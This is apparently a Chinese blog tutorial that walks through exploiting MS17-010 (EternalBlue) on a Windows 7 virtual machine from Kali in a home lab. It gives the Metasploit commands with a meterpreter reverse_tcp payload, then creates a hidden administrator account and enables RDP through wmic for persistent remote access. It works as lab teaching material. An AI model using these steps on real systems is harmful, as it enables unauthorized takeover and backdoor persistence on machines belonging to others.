关于永恒之蓝 MS17-010 漏洞利用

环境信息如下



VMWare虚拟机

攻击机:Kali Linux IP:192.168.40.131
靶机:Windows 7 IP:192.168.40.135

物理机系统:windows 11



进入Kali,打开msfconsole



查找相关模块
search ms17-010



使用模块0
use 0



使用payload
set payload windows/x64/meterpreter/reverse_tcp



设置靶机IP
set rhosts 192.168.40.135



接着输入run或exploit执行

这里我们可以看见已经成功打入



输入shell,进入靶机终端



首先创建一个新用户
net user acexze 123456 /add



接着将这个用户设置为管理员
net localgroup administrators acexze /add



然后我们开启靶机的3389端口以供我们进行远程连接
wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1



在物理机上打开终端,开启远程桌面连接
mstsc



进入远程连接界面,输入靶机IP



点击“显示选项”,展开,填入我们新创建的用户
 



这时远程桌面连接会显示,我们点击“是”



靶机桌面会显示



在无操作后30秒,靶机桌面显示



此时我们的物理机也远程连接进了靶机桌面


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值